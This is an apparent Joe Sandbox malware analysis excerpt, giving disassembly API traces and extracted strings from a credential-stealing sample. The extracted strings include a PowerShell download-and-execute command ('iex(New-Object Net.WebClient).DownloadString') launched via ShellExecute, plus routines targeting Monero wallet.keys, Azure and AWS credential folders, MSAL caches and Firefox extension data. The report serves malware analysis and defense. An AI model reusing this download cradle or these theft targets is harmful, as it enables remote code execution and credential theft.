                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 0fdca6304d09e5e4ea9f45891987cf0288adef1a94e5229231bfb2c23ed94ad3
                          • Instruction ID: 5b617e59f65a99a1531ee25527cde75db2f18b84e0bb4c4bfc3c68072e70c182
                          • Opcode Fuzzy Hash: 0fdca6304d09e5e4ea9f45891987cf0288adef1a94e5229231bfb2c23ed94ad3
                          • Instruction Fuzzy Hash: CB02B771A0165DDBCB21EFA5C889AAF7BB5AF58304F148129F845A7352DB38DC43CB90
                          APIs
                            • Part of subcall function 007D1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D1135
                            • Part of subcall function 007D1120: RtlAllocateHeap.NTDLL(00000000), ref: 007D113C
                            • Part of subcall function 007D1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 007D1159
                            • Part of subcall function 007D1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 007D1173
                            • Part of subcall function 007D1120: RegCloseKey.ADVAPI32(?), ref: 007D117D
                          • lstrcat.KERNEL32(?,00000000), ref: 007D11C0
                          • lstrlen.KERNEL32(?), ref: 007D11CD
                          • lstrcat.KERNEL32(?,.keys), ref: 007D11E8
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D121F
                          • lstrlen.KERNEL32(01259298), ref: 007D122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1251
                          • lstrcat.KERNEL32(00000000,01259298), ref: 007D1259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 007D1264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 007D1294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D12BA
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D12FF
                          • lstrlen.KERNEL32(0125D580), ref: 007D130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1335
                          • lstrcat.KERNEL32(00000000,?), ref: 007D133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1378
                          • lstrcat.KERNEL32(00000000), ref: 007D1385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D13AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007D13D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1401
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D143D
                            • Part of subcall function 007EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 007EEE12
                          • DeleteFileA.KERNEL32(?), ref: 007D1471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: 41924c91a6412914319bee7177eefb75c5ddb2a5a6f01b5bb560e08651280679
                          • Instruction ID: b465516cf9302d3c3a3ff09b5f3c2246093c87fe89dce5403f54cc37890caa1a
                          • Opcode Fuzzy Hash: 41924c91a6412914319bee7177eefb75c5ddb2a5a6f01b5bb560e08651280679
                          • Instruction Fuzzy Hash: 2FA17271A1021AABDB21EFB4DD89AAF77B9AF54300F444125F945E7352DB38ED038B90
                          APIs
                          • memset.MSVCRT ref: 007EE740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007EE769
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE79F
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 007EE7C6
                          • memset.MSVCRT ref: 007EE805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007EE82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE85F
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 007EE886
                          • memset.MSVCRT ref: 007EE8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007EE8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE920
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007EE947
                          • memset.MSVCRT ref: 007EE986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 281eeb59ec1406d0257fcac9114d8e9f5ed119722bafcde9d98aafd0faaa5e95
                          • Instruction ID: 206531f6bfd15ab4104a0573226ca888135291a56336638ad6a32f2abfa23423
                          • Opcode Fuzzy Hash: 281eeb59ec1406d0257fcac9114d8e9f5ed119722bafcde9d98aafd0faaa5e95
                          • Instruction Fuzzy Hash: FD710B71A4022DABD761EBA4DC4AFED7374EF58700F004894B719AB2C1DE789E468B54
                          APIs
                          • lstrcpy.KERNEL32 ref: 007EABCF
                          • lstrlen.KERNEL32(0125E088), ref: 007EABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EAC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EAC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EACB7
                          • lstrlen.KERNEL32(00804AD4), ref: 007EACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EACF3
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007EACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAD28
                          • lstrlen.KERNEL32(00804AD4), ref: 007EAD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAD5C
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007EAD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAD91
                          • lstrlen.KERNEL32(0125E028), ref: 007EADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EAE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EAE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAE6F
                          • lstrlen.KERNEL32(00000000), ref: 007EAE85
                          • lstrcpy.KERNEL32(00000000,0125E070), ref: 007EAEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 98fd1c4a5909b27d4b91866ec84d56ebd27ba2538f9d1c01fa91f4f76a2a5958
                          • Instruction ID: 9c1e62ff53123848ff4bb97cbc78a2fed6a7099c3b092602ce9d48076271660e
                          • Opcode Fuzzy Hash: 98fd1c4a5909b27d4b91866ec84d56ebd27ba2538f9d1c01fa91f4f76a2a5958
                          • Instruction Fuzzy Hash: 4CB15130A1156AEBCB21EFA5DC4DAAF77B9EF54300F044525B815A7262DB38ED03CB91
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,007E72A4), ref: 007F47E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 007F47FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 007F480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 007F481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 007F482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 007F4840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 007F4851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 007F4862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 007F4873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 007F4884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 007F4895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 625c0e94d280d3dacabbf9fc7a2e2bae4f61fe4b12697ca7d5080ed8a87ed3b4
                          • Instruction ID: 76749b6ddbc311a1b09ba5f2b951e943d0839673fc961909ca136aeeef06ab3f
                          • Opcode Fuzzy Hash: 625c0e94d280d3dacabbf9fc7a2e2bae4f61fe4b12697ca7d5080ed8a87ed3b4
                          • Instruction Fuzzy Hash: 14118771952B28ABC750DFF4EC0DA573AB8FA09B05304081AF5A1D22A5DBFC8443DF68
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EBE53
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EBE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 007EBE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EBEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 007EBEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EBEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EBEEB
                          • lstrlen.KERNEL32(')"), ref: 007EBEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EBF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 007EBF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EBF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 007EBF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EBF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 007EBF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EBFBA
                          • ShellExecuteEx.SHELL32(?), ref: 007EC00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: 5ffe1a7ebedb5948da709660b48860ed9d0be4c4086c2397100f9dab7d963d1c
                          • Instruction ID: 97922d422e60baea2669d1e84b4cc5c65ca5c4ffbfc5c2498ebb13fa66843921
                          • Opcode Fuzzy Hash: 5ffe1a7ebedb5948da709660b48860ed9d0be4c4086c2397100f9dab7d963d1c
                          • Instruction Fuzzy Hash: 49618271A1225A9BCB21EFB59C896AF7BB8EF58300F045425F905E3352DB3CD9038B91
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F184F
                          • lstrlen.KERNEL32(01247318), ref: 007F1860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F18C1
                          • lstrlen.KERNEL32(00804FA0), ref: 007F18D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F18F4
                          • lstrcat.KERNEL32(00000000,00804FA0), ref: 007F1900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F192F
                          • lstrlen.KERNEL32(01247328), ref: 007F1945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F19A6
                          • lstrlen.KERNEL32(00804FA0), ref: 007F19B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F19D9
                          • lstrcat.KERNEL32(00000000,00804FA0), ref: 007F19E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1A14
                          • lstrlen.KERNEL32(012472D8), ref: 007F1A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1A8B
                          • lstrlen.KERNEL32(01247348), ref: 007F1AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: 7febf7bf9c13f1c0091611111178d080a883f5b6df71cfcbf7cdd3fa878b5028
                          • Instruction ID: 8c17cf9054e1163c621d79cdfe1d81581485c9acb4d8ea3abe7ba328b6a6e6d8
                          • Opcode Fuzzy Hash: 7febf7bf9c13f1c0091611111178d080a883f5b6df71cfcbf7cdd3fa878b5028
                          • Instruction Fuzzy Hash: 899129B060120BDBD720DFB5DC98A26B7E8EF14340F549829A996D3352DB78E8438B50
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007E47C5
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E4812
                          • lstrlen.KERNEL32(00804B60), ref: 007E481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E483A
                          • lstrcat.KERNEL32(00000000,00804B60), ref: 007E4846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E48A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E48CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 007E48DC
                          • lstrlen.KERNEL32(?), ref: 007E48F0
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E4931
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E49B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E49E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: df7096a69f2d1a9edb062d41b785425f099c4cbe8a2f723e7c0c6bb8efd4ae88
                          • Instruction ID: bbf2398961e53fd24c8d763de912387c01dc438302ac5d9100bab4e5685bc1e9
                          • Opcode Fuzzy Hash: df7096a69f2d1a9edb062d41b785425f099c4cbe8a2f723e7c0c6bb8efd4ae88
                          • Instruction Fuzzy Hash: 1FB17471A1125A9BCB21EFB5D849AAF77B9EF54300F049529FC45A7312DB38EC078B90
